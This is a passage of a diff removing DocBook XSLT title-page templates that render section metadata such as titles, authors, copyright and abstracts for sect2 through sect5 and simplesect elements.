mode="sect2.titlepage.recto.auto.mode" select="info/authorgroup"/> - <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/author"/> - <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/author"/> - <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/othercredit"/> - <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/othercredit"/> - <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/releaseinfo"/> - <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/releaseinfo"/> - <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/copyright"/> - <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/copyright"/> - <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/legalnotice"/> - <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/legalnotice"/> - <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/pubdate"/> - <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/pubdate"/> - <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/revision"/> - <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/revision"/> - <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/revhistory"/> - <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/revhistory"/> - <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/abstract"/> - <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/abstract"/> -</xsl:template> - -<xsl:template name="sect2.titlepage.verso"> -</xsl:template> - -<xsl:template name="sect2.titlepage.separator"><xsl:if test="count(parent::*)='0'"><hr/></xsl:if> -</xsl:template> - -<xsl:template name="sect2.titlepage.before.recto"> -</xsl:template> - -<xsl:template name="sect2.titlepage.before.verso"> -</xsl:template> - -<xsl:template name="sect2.titlepage"> - <div class="titlepage"> - <div> - <xsl:call-template name="sect2.titlepage.before.recto"/> - <xsl:call-template name="sect2.titlepage.recto"/> - </div> - <div> - <xsl:call-template name="sect2.titlepage.before.verso"/> - <xsl:call-template name="sect2.titlepage.verso"/> - </div> - <xsl:call-template name="sect2.titlepage.separator"/> - </div> -</xsl:template> - -<xsl:template match="*" mode="sect2.titlepage.recto.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="*" mode="sect2.titlepage.verso.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="title" mode="sect2.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect2.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="subtitle" mode="sect2.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect2.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="corpauthor" mode="sect2.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect2.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="authorgroup" mode="sect2.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect2.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="author" mode="sect2.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect2.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="othercredit" mode="sect2.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect2.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="releaseinfo" mode="sect2.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect2.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="copyright" mode="sect2.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect2.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="legalnotice" mode="sect2.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect2.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="pubdate" mode="sect2.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect2.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revision" mode="sect2.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect2.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revhistory" mode="sect2.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect2.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="abstract" mode="sect2.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect2.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template name="sect3.titlepage.recto"> - <xsl:choose> - <xsl:when test="sect3info/title"> - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/title"/> - </xsl:when> - <xsl:when test="info/title"> - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/title"/> - </xsl:when> - <xsl:when test="title"> - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="title"/> - </xsl:when> - </xsl:choose> - - <xsl:choose> - <xsl:when test="sect3info/subtitle"> - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/subtitle"/> - </xsl:when> - <xsl:when test="info/subtitle"> - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/subtitle"/> - </xsl:when> - <xsl:when test="subtitle"> - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="subtitle"/> - </xsl:when> - </xsl:choose> - - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/corpauthor"/> - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/corpauthor"/> - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/authorgroup"/> - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/authorgroup"/> - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/author"/> - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/author"/> - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/othercredit"/> - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/othercredit"/> - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/releaseinfo"/> - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/releaseinfo"/> - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/copyright"/> - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/copyright"/> - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/legalnotice"/> - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/legalnotice"/> - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/pubdate"/> - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/pubdate"/> - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/revision"/> - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/revision"/> - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/revhistory"/> - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/revhistory"/> - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/abstract"/> - <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/abstract"/> -</xsl:template> - -<xsl:template name="sect3.titlepage.verso"> -</xsl:template> - -<xsl:template name="sect3.titlepage.separator"><xsl:if test="count(parent::*)='0'"><hr/></xsl:if> -</xsl:template> - -<xsl:template name="sect3.titlepage.before.recto"> -</xsl:template> - -<xsl:template name="sect3.titlepage.before.verso"> -</xsl:template> - -<xsl:template name="sect3.titlepage"> - <div class="titlepage"> - <div> - <xsl:call-template name="sect3.titlepage.before.recto"/> - <xsl:call-template name="sect3.titlepage.recto"/> - </div> - <div> - <xsl:call-template name="sect3.titlepage.before.verso"/> - <xsl:call-template name="sect3.titlepage.verso"/> - </div> - <xsl:call-template name="sect3.titlepage.separator"/> - </div> -</xsl:template> - -<xsl:template match="*" mode="sect3.titlepage.recto.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="*" mode="sect3.titlepage.verso.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="title" mode="sect3.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect3.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="subtitle" mode="sect3.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect3.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="corpauthor" mode="sect3.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect3.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="authorgroup" mode="sect3.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect3.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="author" mode="sect3.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect3.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="othercredit" mode="sect3.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect3.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="releaseinfo" mode="sect3.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect3.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="copyright" mode="sect3.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect3.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="legalnotice" mode="sect3.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect3.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="pubdate" mode="sect3.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect3.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revision" mode="sect3.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect3.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revhistory" mode="sect3.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect3.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="abstract" mode="sect3.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect3.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template name="sect4.titlepage.recto"> - <xsl:choose> - <xsl:when test="sect4info/title"> - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/title"/> - </xsl:when> - <xsl:when test="info/title"> - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/title"/> - </xsl:when> - <xsl:when test="title"> - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="title"/> - </xsl:when> - </xsl:choose> - - <xsl:choose> - <xsl:when test="sect4info/subtitle"> - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/subtitle"/> - </xsl:when> - <xsl:when test="info/subtitle"> - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/subtitle"/> - </xsl:when> - <xsl:when test="subtitle"> - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="subtitle"/> - </xsl:when> - </xsl:choose> - - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/corpauthor"/> - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/corpauthor"/> - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/authorgroup"/> - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/authorgroup"/> - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/author"/> - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/author"/> - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/othercredit"/> - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/othercredit"/> - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/releaseinfo"/> - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/releaseinfo"/> - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/copyright"/> - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/copyright"/> - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/legalnotice"/> - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/legalnotice"/> - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/pubdate"/> - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/pubdate"/> - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/revision"/> - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/revision"/> - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/revhistory"/> - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/revhistory"/> - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="sect4info/abstract"/> - <xsl:apply-templates mode="sect4.titlepage.recto.auto.mode" select="info/abstract"/> -</xsl:template> - -<xsl:template name="sect4.titlepage.verso"> -</xsl:template> - -<xsl:template name="sect4.titlepage.separator"><xsl:if test="count(parent::*)='0'"><hr/></xsl:if> -</xsl:template> - -<xsl:template name="sect4.titlepage.before.recto"> -</xsl:template> - -<xsl:template name="sect4.titlepage.before.verso"> -</xsl:template> - -<xsl:template name="sect4.titlepage"> - <div class="titlepage"> - <div> - <xsl:call-template name="sect4.titlepage.before.recto"/> - <xsl:call-template name="sect4.titlepage.recto"/> - </div> - <div> - <xsl:call-template name="sect4.titlepage.before.verso"/> - <xsl:call-template name="sect4.titlepage.verso"/> - </div> - <xsl:call-template name="sect4.titlepage.separator"/> - </div> -</xsl:template> - -<xsl:template match="*" mode="sect4.titlepage.recto.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="*" mode="sect4.titlepage.verso.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="title" mode="sect4.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect4.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="subtitle" mode="sect4.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect4.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="corpauthor" mode="sect4.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect4.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="authorgroup" mode="sect4.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect4.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="author" mode="sect4.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect4.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="othercredit" mode="sect4.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect4.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="releaseinfo" mode="sect4.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect4.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="copyright" mode="sect4.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect4.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="legalnotice" mode="sect4.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect4.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="pubdate" mode="sect4.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect4.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revision" mode="sect4.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect4.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revhistory" mode="sect4.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect4.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="abstract" mode="sect4.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect4.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect4.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template name="sect5.titlepage.recto"> - <xsl:choose> - <xsl:when test="sect5info/title"> - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/title"/> - </xsl:when> - <xsl:when test="info/title"> - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/title"/> - </xsl:when> - <xsl:when test="title"> - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="title"/> - </xsl:when> - </xsl:choose> - - <xsl:choose> - <xsl:when test="sect5info/subtitle"> - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/subtitle"/> - </xsl:when> - <xsl:when test="info/subtitle"> - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/subtitle"/> - </xsl:when> - <xsl:when test="subtitle"> - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="subtitle"/> - </xsl:when> - </xsl:choose> - - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/corpauthor"/> - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/corpauthor"/> - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/authorgroup"/> - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/authorgroup"/> - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/author"/> - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/author"/> - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/othercredit"/> - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/othercredit"/> - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/releaseinfo"/> - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/releaseinfo"/> - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/copyright"/> - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/copyright"/> - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/legalnotice"/> - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/legalnotice"/> - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/pubdate"/> - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/pubdate"/> - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/revision"/> - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/revision"/> - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/revhistory"/> - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/revhistory"/> - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="sect5info/abstract"/> - <xsl:apply-templates mode="sect5.titlepage.recto.auto.mode" select="info/abstract"/> -</xsl:template> - -<xsl:template name="sect5.titlepage.verso"> -</xsl:template> - -<xsl:template name="sect5.titlepage.separator"><xsl:if test="count(parent::*)='0'"><hr/></xsl:if> -</xsl:template> - -<xsl:template name="sect5.titlepage.before.recto"> -</xsl:template> - -<xsl:template name="sect5.titlepage.before.verso"> -</xsl:template> - -<xsl:template name="sect5.titlepage"> - <div class="titlepage"> - <div> - <xsl:call-template name="sect5.titlepage.before.recto"/> - <xsl:call-template name="sect5.titlepage.recto"/> - </div> - <div> - <xsl:call-template name="sect5.titlepage.before.verso"/> - <xsl:call-template name="sect5.titlepage.verso"/> - </div> - <xsl:call-template name="sect5.titlepage.separator"/> - </div> -</xsl:template> - -<xsl:template match="*" mode="sect5.titlepage.recto.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="*" mode="sect5.titlepage.verso.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="title" mode="sect5.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect5.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="subtitle" mode="sect5.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect5.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="corpauthor" mode="sect5.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect5.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="authorgroup" mode="sect5.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect5.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="author" mode="sect5.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect5.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="othercredit" mode="sect5.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect5.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="releaseinfo" mode="sect5.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect5.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="copyright" mode="sect5.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect5.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="legalnotice" mode="sect5.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect5.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="pubdate" mode="sect5.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect5.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revision" mode="sect5.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect5.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revhistory" mode="sect5.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect5.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="abstract" mode="sect5.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="sect5.titlepage.recto.style"> -<xsl:apply-templates select="." mode="sect5.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template name="simplesect.titlepage.recto"> - <xsl:choose> - <xsl:when test="simplesectinfo/title"> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/title"/> - </xsl:when> - <xsl:when test="docinfo/title"> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/title"/> - </xsl:when> - <xsl:when test="info/title"> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/title"/> - </xsl:when> - <xsl:when test="title"> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="title"/> - </xsl:when> - </xsl:choose> - - <xsl:choose> - <xsl:when test="simplesectinfo/subtitle"> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/subtitle"/> - </xsl:when> - <xsl:when test="docinfo/subtitle"> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/subtitle"/> - </xsl:when> - <xsl:when test="info/subtitle"> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/subtitle"/> - </xsl:when> - <xsl:when test="subtitle"> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="subtitle"/> - </xsl:when> - </xsl:choose> - - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/corpauthor"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/corpauthor"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/corpauthor"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/authorgroup"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/authorgroup"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/authorgroup"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/author"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/author"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/author"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/othercredit"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/othercredit"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/othercredit"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/releaseinfo"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/releaseinfo"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/releaseinfo"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/copyright"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/copyright"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/copyright"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/legalnotice"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/legalnotice"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/legalnotice"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/pubdate"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/pubdate"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" 